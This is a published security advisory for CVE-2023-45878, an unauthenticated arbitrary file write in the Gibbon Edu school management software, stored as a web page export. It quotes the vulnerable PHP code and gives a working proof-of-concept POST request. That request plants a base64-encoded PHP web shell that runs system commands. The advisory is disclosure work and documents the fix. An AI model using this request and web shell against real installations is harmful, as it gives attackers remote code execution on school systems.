{"id":21394,"date":"2023-11-10T12:08:39","date_gmt":"2023-11-10T11:08:39","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2023-0025\/"},"modified":"2023-11-14T09:53:04","modified_gmt":"2023-11-14T08:53:04","slug":"usd-2023-0025","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0025\/","title":{"rendered":"usd-2023-0025"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2023-0025 | Arbitrary File Write<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0025
Product<\/strong>: Gibbon (https:\/\/gibbonedu.org\/)
Affected Version<\/strong>: 25.0.01 (before commit '226d83568cf3d447c4d86d4e5aba2c6e6289045d')
Vulnerability Type<\/strong>: CWE-434: Arbitrary File Write<\/span>
Security Risk<\/strong>: Critical
Vendor URL<\/strong>: https:\/\/gibbonedu.org<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: CVE-2023-45878<\/p>\n

Desciption<\/h3>\n

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.<\/p>\n

Unauthenticated attackers can upload arbitrary files to the application and receive code execution on the underlying system.
To receive RCE an attacker must craft a fake<\/em> image which can be stored as PHP file.<\/p>\n

Proof of Concept<\/h3>\n

The Rubrics<\/em> module has a file rubrics_visualise_saveAjax.php<\/strong> (source<\/a> )which can be accessed without being authenticated.<\/p>\n

The file accepts the img<\/strong>, path<\/strong> and gibbonPersonID<\/strong> as POST parameters.<\/p>\n

From the source<\/a> line 22:<\/p>\n

\n
<\/span>[...]<\/span>
$img<\/span> <\/span>=<\/span> <\/span>$_POST['img'] ?? null<\/span>;<\/span>
$imgPath<\/span> <\/span>=<\/span> <\/span>$_POST['path'] ?? null<\/span>;<\/span>
$gibbonPersonID<\/span> <\/span>=<\/span> <\/span>!empty($_POST['gibbonPersonID']) ? str_pad($_POST['gibbonPersonID'], 10, '0', STR_PAD_LEFT) : null<\/span>;<\/span>
$absolutePath<\/span> <\/span>=<\/span> <\/span>$gibbon->session->get('absolutePath')<\/span>;<\/span><\/pre>\n<\/div>\n
The img<\/strong> parameter is expected to be a base64 encoded image as of line 32-34:<\/p>\n
\n
<\/span>[...]<\/span>
\/\/ Decode raw image data<\/span>
list($type, $img)<\/span> <\/span>=<\/span> <\/span>explode('<\/span>;', $img);<\/span>
list(, $img)<\/span>      <\/span>=<\/span> <\/span>explode(',', $img)<\/span>;<\/span>
$img<\/span> <\/span>=<\/span> <\/span>base64_decode($img)<\/span>;<\/span><\/pre>\n<\/div>\n
If the path<\/strong> parameter is set, the defined path is used as the destination folder, concatinated with the absolute path of the gibbon installation directory.<\/p>\n
The value of the img<\/strong> parameter is written to the defined file path as of line 49-51:<\/p>\n
\n
<\/span>\/\/ Write image data<\/span>
$<\/span>fp<\/span> <\/span>=<\/span> <\/span>fopen<\/span>(<\/span>$<\/span>absolutePath<\/span>.<\/span>'\/<\/span>'.$imgPath, '<\/span>w<\/span>'<\/span>);<\/span>
fwrite<\/span>(<\/span>$<\/span>fp<\/span>,<\/span> <\/span>$<\/span>img<\/span>);<\/span>
fclose<\/span>(<\/span>$<\/span>fp<\/span>);<\/span><\/pre>\n<\/div>\n
The following request will write the payload <?php echo system($_GET['cmd'])?><\/strong> to the file asdf.php<\/strong>.<\/p>\n
\n
<\/span>POST<\/span> \/modules\/Rubrics\/rubrics_visualise_saveAjax.php<\/span> HTTP<\/span>\/<\/span>1.1<\/span>
Host<\/span>:<\/span> localhost:8080<\/span>
[...]<\/span>\n\n\nimg=image\/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001\n<\/pre>\n<\/div>\n
The payload must be base64 encoded seperated by ;<\/strong> and ,<\/strong> characters.<\/p>\n
Fix<\/h3>\n
Ensure that only valid file types can be uploaded.<\/p>\n
References<\/h3>\n